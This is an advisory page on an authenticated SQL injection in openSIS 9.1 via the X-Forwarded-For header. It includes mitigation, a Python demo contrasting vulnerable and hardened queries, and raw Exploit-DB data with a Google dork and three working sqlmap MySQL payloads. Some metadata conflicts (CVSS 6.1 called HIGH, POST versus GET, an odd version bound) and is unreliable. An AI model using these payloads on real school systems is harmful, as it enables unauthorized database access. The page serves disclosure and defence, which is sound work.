Vendor: Open Source Information System Community
Reported by: Devrim Dıragumandan (d0ub1edd)
CVSS: 6.1 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: Open Source Information System Community
Affected Version From: 9.1
Affected Version To: 45300
Patch Exists: YES
CPE: a:os4ed:opensis:9.1
Platforms Tested: Linux
Year: 2024

openSIS 9.1 – SQL Injection (Authenticated)

A SQL injection vulnerability was discovered in OS4Ed Open Source Information System Community (openSIS) version 9.1. The value of the X-Forwarded-For request header sent to /Ajax.php is placed into a MySQL query as a single-quoted string without escaping or parameterization, so an authenticated attacker who sets that header can break out of the string and execute SQL of their choosing. Because X-Forwarded-For is supplied by the client, no proxy is needed to control it. The sqlmap output below confirms boolean-based blind, error-based and time-based blind injection through this header.

Mitigation:

Apply the vendor fix at https://github.com/OS4ED/openSIS-Classic/pull/322. More generally, a client-supplied header such as X-Forwarded-For must never be concatenated into a query: pass it to the database as a bound parameter of a prepared statement, validate that it is a literal IP address before using it, and trust it as the client address only when the application is deployed behind a proxy you control. Note that exploitation requires an authenticated session, so compromised or low-privileged accounts are the relevant threat.
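The following is an added example, not code from the advisory or from the openSIS project: it reproduces the class of bug the advisory describes (a client-controlled X-Forwarded-For value concatenated into a single-quoted SQL string) and puts the hardened form beside it. The table name login_log, its rows, and the lookup query are constructed assumptions; the real openSIS query is not shown on this page. SQLite stands in for MySQL, so the page's EXTRACTVALUE/SLEEP payloads are replaced by the same single-quote breakout with a plain boolean condition, which is what makes boolean-based blind injection observable.

```python
import ipaddress
import sqlite3

# Constructed sample data: a hypothetical table keyed on the client address.
# Neither the schema nor the rows come from openSIS.
SAMPLE_ROWS = [
    (1, "admin", "127.0.0.2"),
    (2, "teacher", "10.0.0.5"),
    (3, "student", "192.168.1.20"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database holding the constructed login_log table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login_log (id INTEGER PRIMARY KEY, username TEXT, ip TEXT)"
    )
    conn.executemany("INSERT INTO login_log VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def client_ip_from_headers(headers: dict) -> str:
    """Mimic the common PHP pattern that prefers X-Forwarded-For over REMOTE_ADDR.

    The header is set by the client, so whatever comes back here is untrusted.
    X-Forwarded-For may carry a comma-separated proxy chain; the first entry is
    the claimed originating client.
    """
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return headers.get("REMOTE_ADDR", "")


def lookup_vulnerable(conn: sqlite3.Connection, headers: dict) -> list:
    """VULNERABLE: the header value is concatenated into a single-quoted string.

    A value such as  127.0.0.2' AND '1'='1  closes the quote and appends a
    condition, so the result set depends on the truth of the injected clause.
    That difference is exactly what boolean-based blind SQLi exploits.
    """
    ip = client_ip_from_headers(headers)
    sql = "SELECT username FROM login_log WHERE ip = '" + ip + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn: sqlite3.Connection, headers: dict) -> list:
    """HARDENED: validate the value as a literal IP, then bind it as a parameter.

    ipaddress.ip_address() raises ValueError for anything that is not a bare
    IPv4/IPv6 address, which rejects every quote-breaking payload. The bound
    parameter means the value is never interpreted as SQL even if validation
    were relaxed later.
    """
    ip = client_ip_from_headers(headers)
    try:
        ip = str(ipaddress.ip_address(ip))
    except ValueError:
        return []
    rows = conn.execute("SELECT username FROM login_log WHERE ip = ?", (ip,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    true_payload = {"X-Forwarded-For": "127.0.0.2' AND '1'='1"}
    false_payload = {"X-Forwarded-For": "127.0.0.2' AND '1'='2"}
    dump_payload = {"X-Forwarded-For": "' OR '1'='1"}
    print("vulnerable, true condition :", lookup_vulnerable(db, true_payload))
    print("vulnerable, false condition:", lookup_vulnerable(db, false_payload))
    print("vulnerable, OR 1=1         :", lookup_vulnerable(db, dump_payload))
    print("hardened, true condition   :", lookup_hardened(db, true_payload))
    print("hardened, legitimate chain :", lookup_hardened(db, {"X-Forwarded-For": "10.0.0.5, 203.0.113.9"}))
```

The vulnerable function returns a row for the true condition and nothing for the false one, which is the oracle sqlmap's boolean-based blind technique relies on; the OR payload dumps every row. The hardened function returns an empty result for all three payloads while still resolving a legitimate proxy chain to its first address.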

Exploit-DB raw data:

# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameter in a POST request sent to /Ajax.php.

GET /Ajax.php?modname=x HTTP/1.1

---
    Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
--- 

FIX: https://github.com/OS4ED/openSIS-Classic/pull/322